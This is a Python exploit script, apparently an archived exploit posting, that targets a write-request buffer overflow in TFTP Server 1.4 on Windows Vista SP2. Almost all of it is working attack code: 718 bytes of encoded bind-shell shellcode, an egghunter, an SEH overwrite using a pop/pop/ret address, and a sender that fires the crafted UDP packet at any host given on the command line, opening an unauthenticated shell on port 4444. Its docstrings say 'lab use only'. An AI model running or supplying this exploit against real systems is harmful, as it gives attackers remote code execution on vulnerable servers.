TFTP Server 1.4 WRQ Buffer Overflow
Posted on 22 July 2016
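#!/usr/bin/python
# Exploit Title: [TFTP Server 1.4 - WRQ Buffer Overflow Exploit [Egghunter]]
# Exploit Author: [Karn Ganeshen]
# Vendor Homepage: [http://sourceforge.net/projects/tftp-server/]
# Version: [1.4]
# Tested on: [Windows Vista SP2]
#
# Coded this for Vista Ultimate, Service Pack 2
# 3-byte overwrite + short jump + Egghunter
# Standalone mode
#
# Couple of overflow exploits already here for this tftp, none for Vista SP2 + Egghunter:
# http://www.exploit-db.com/exploits/5314/
# http://www.exploit-db.com/exploits/10542/
# http://www.exploit-db.com/exploits/5563/
# https://www.exploit-db.com/exploits/18345/
#
"""TFTP Server 1.4 WRQ (write request) SEH overflow, egghunter variant.

One UDP datagram is sent to the TFTP port.  The oversized *filename* field of
the WRQ is laid out as:

    734 x NOP | egg "T00WT00W" | 718-byte bind shell | 10 x NOP | egghunter
    | 10 x NOP | nSEH = short jmp back | SEH = 0x0040CC22 (low 3 bytes)

The fourth (high) byte of the SEH address is 0x00, which cannot be placed
inside the filename because TFTP strings are NUL-terminated; the packet's own
terminator supplies it.  After the pop/pop/ret in TFTPServerSP.exe execution
lands on nSEH, the short jump leads into the egghunter, which scans memory
for the egg and transfers control to the shellcode behind it.

Lab use only: the payload opens an *unauthenticated* bind shell on the target
(port 4444), reachable by anyone who can route to the host.
"""
import socket
import sys

# Default target; can be overridden on the command line (host [port]).
host = '192.168.49.187'
port = 69

# msfvenom -p windows/shell_bind_tcp LHOST=192.168.49.187 -b \x00 EXITFUNC=seh -f c -e x86/alpha_mixed
# Payload size: 718 bytes (alphanumeric-mixed encoded, NUL-free).
shellcode = (
    b"\x89\xe5\xd9\xcf\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    b"\x59\x6c\x48\x68\x4f\x72\x75\x50\x63\x30\x33\x30\x33\x50\x6f"
    b"\x79\x59\x75\x35\x61\x6f\x30\x51\x74\x6c\x4b\x42\x70\x46\x50"
    b"\x6e\x6b\x62\x72\x66\x6c\x6c\x4b\x73\x62\x56\x74\x6c\x4b\x43"
    b"\x42\x45\x78\x66\x6f\x58\x37\x73\x7a\x56\x46\x54\x71\x4b\x4f"
    b"\x6e\x4c\x45\x6c\x50\x61\x51\x6c\x33\x32\x74\x6c\x61\x30\x4b"
    b"\x71\x68\x4f\x74\x4d\x63\x31\x39\x57\x58\x62\x68\x72\x76\x32"
    b"\x71\x47\x4e\x6b\x52\x72\x64\x50\x4c\x4b\x30\x4a\x45\x6c\x6c"
    b"\x4b\x30\x4c\x36\x71\x50\x78\x68\x63\x70\x48\x76\x61\x6b\x61"
    b"\x43\x61\x4e\x6b\x61\x49\x45\x70\x63\x31\x48\x53\x4c\x4b\x72"
    b"\x69\x35\x48\x38\x63\x77\x4a\x77\x39\x6c\x4b\x65\x64\x4c\x4b"
    b"\x67\x71\x58\x56\x75\x61\x4b\x4f\x6c\x6c\x69\x51\x7a\x6f\x76"
    b"\x6d\x65\x51\x39\x57\x45\x68\x4d\x30\x34\x35\x6a\x56\x45\x53"
    b"\x53\x4d\x5a\x58\x47\x4b\x53\x4d\x77\x54\x43\x45\x4d\x34\x73"
    b"\x68\x6c\x4b\x61\x48\x57\x54\x46\x61\x6b\x63\x61\x76\x6c\x4b"
    b"\x74\x4c\x42\x6b\x4c\x4b\x30\x58\x57\x6c\x75\x51\x79\x43\x4c"
    b"\x4b\x33\x34\x6e\x6b\x46\x61\x4e\x30\x4b\x39\x73\x74\x56\x44"
    b"\x65\x74\x63\x6b\x43\x6b\x63\x51\x52\x79\x53\x6a\x66\x31\x59"
    b"\x6f\x6b\x50\x33\x6f\x33\x6f\x32\x7a\x6e\x6b\x35\x42\x78\x6b"
    b"\x4e\x6d\x43\x6d\x62\x48\x37\x43\x46\x52\x37\x70\x35\x50\x61"
    b"\x78\x72\x57\x64\x33\x45\x62\x71\x4f\x56\x34\x53\x58\x32\x6c"
    b"\x63\x47\x34\x66\x46\x67\x4b\x4f\x6a\x75\x4e\x58\x4e\x70\x43"
    b"\x31\x75\x50\x35\x50\x31\x39\x6f\x34\x72\x74\x70\x50\x55\x38"
    b"\x56\x49\x4f\x70\x30\x6b\x47\x70\x69\x6f\x48\x55\x71\x7a\x36"
    b"\x68\x51\x49\x70\x50\x4a\x42\x4b\x4d\x61\x50\x76\x30\x33\x70"
    b"\x36\x30\x35\x38\x69\x7a\x64\x4f\x59\x4f\x6b\x50\x39\x6f\x4b"
    b"\x65\x7a\x37\x73\x58\x43\x32\x63\x30\x56\x71\x71\x4c\x6c\x49"
    b"\x69\x76\x71\x7a\x64\x50\x53\x66\x72\x77\x73\x58\x4a\x62\x79"
    b"\x4b\x50\x37\x65\x37\x39\x6f\x6b\x65\x36\x37\x42\x48\x48\x37"
    b"\x4b\x59\x47\x48\x6b\x4f\x39\x6f\x4b\x65\x51\x47\x51\x78\x50"
    b"\x74\x5a\x4c\x65\x6b\x79\x71\x69\x6f\x6a\x75\x51\x47\x4f\x67"
    b"\x53\x58\x61\x65\x32\x4e\x32\x6d\x70\x61\x49\x6f\x69\x45\x61"
    b"\x78\x72\x43\x32\x4d\x30\x64\x43\x30\x4b\x39\x4a\x43\x70\x57"
    b"\x53\x67\x72\x77\x64\x71\x48\x76\x31\x7a\x52\x32\x42\x79\x52"
    b"\x76\x38\x62\x69\x6d\x65\x36\x4b\x77\x37\x34\x61\x34\x47\x4c"
    b"\x57\x71\x45\x51\x6c\x4d\x77\x34\x44\x64\x72\x30\x78\x46\x53"
    b"\x30\x67\x34\x33\x64\x32\x70\x70\x56\x73\x66\x42\x76\x62\x66"
    b"\x46\x36\x30\x4e\x63\x66\x46\x36\x42\x73\x62\x76\x52\x48\x71"
    b"\x69\x38\x4c\x35\x6f\x6e\x66\x79\x6f\x49\x45\x4c\x49\x4b\x50"
    b"\x52\x6e\x43\x66\x30\x46\x59\x6f\x54\x70\x62\x48\x34\x48\x6c"
    b"\x47\x35\x4d\x55\x30\x39\x6f\x38\x55\x4f\x4b\x59\x6e\x34\x4e"
    b"\x76\x52\x59\x7a\x73\x58\x6d\x76\x6c\x55\x4d\x6d\x4d\x4d\x4b"
    b"\x4f\x6e\x35\x47\x4c\x63\x36\x71\x6c\x45\x5a\x4f\x70\x49\x6b"
    b"\x59\x70\x74\x35\x76\x65\x4d\x6b\x50\x47\x32\x33\x32\x52\x30"
    b"\x6f\x62\x4a\x45\x50\x66\x33\x69\x6f\x4e\x35\x41\x41"
)

# PPR - 0x0040CC22 - in TFTPServerSP.exe
# 3-byte overwrite: only 22 CC 40 travel in the filename; the WRQ's NUL
# terminator becomes the 0x00 high byte (little-endian 0x0040CC22).
ppr_partial = b"\x22\xCC\x40"

# nSEH: short jmp (EB DB = -37 from the end of the jmp) + 2 NOPs.
# NOTE(review): counting back from nSEH over the 10-NOP pad, -35 bytes lands
# 7 bytes into the egghunter (at its "push 2"), not in the pad before it.
# The author reports this working on Vista SP2; confirm the landing spot in
# a debugger before touching any of the padding sizes.
jump_one = b"\xEB\xDB\x90\x90"  # negative jump back

# 32-byte egghunter: syscall 2 via int 2e, loops while al == 5 (low byte of
# STATUS_ACCESS_VIOLATION, i.e. unmapped page), compares each dword with
# "T00W" (mov eax, 0x57303054) twice, then jmp edi into the shellcode.
egghunter = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a"  # WOOT
    b"\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x54\x30\x30\x57\x8b\xfa"
    b"\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

egg = b"T00WT00W"
mode = b"netascii"


def build_packet(payload=shellcode):
    """Return the complete TFTP WRQ datagram (bytes).

    payload: the shellcode placed directly after the egg; defaults to the
             bind shell above.  Must not contain 0x00, because the filename
             is a NUL-terminated string on the wire.

    Raises ValueError if the assembled filename contains a NUL byte, which
    would truncate the overflow before the SEH record is reached.
    """
    filename = (
        b"\x90" * 734
        + egg
        + payload
        + b"\x90" * 10
        + egghunter
        + b"\x90" * 10
        + jump_one
        + ppr_partial
    )
    if b"\x00" in filename:
        raise ValueError("filename contains a NUL byte; TFTP would truncate it")
    # Opcode 2 = WRQ, then "filename\0mode\0".
    return b"\x00\x02" + filename + b"\x00" + mode + b"\x00"


def main(argv=None):
    """Fire the WRQ at the target and say where the bind shell should appear.

    argv: optional [host, [port]]; defaults to sys.argv[1:], then to the
          module-level `host`/`port`.
    Returns the process exit status: 0 on success, 1 if the socket could not
    be created.  Errors from sendto() propagate to the caller.
    """
    args = sys.argv[1:] if argv is None else argv
    target_host = args[0] if len(args) > 0 else host
    target_port = int(args[1]) if len(args) > 1 else port

    evil = build_packet()

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    except socket.error as exc:
        print("socket() failed: %s" % exc)
        return 1
    try:
        print("[*] Sending evil packet, ph33r")
        s.sendto(evil, (target_host, target_port))
    finally:
        s.close()
    print("[*] Check port 4444 for bindshell")
    return 0


if __name__ == "__main__":
    sys.exit(main())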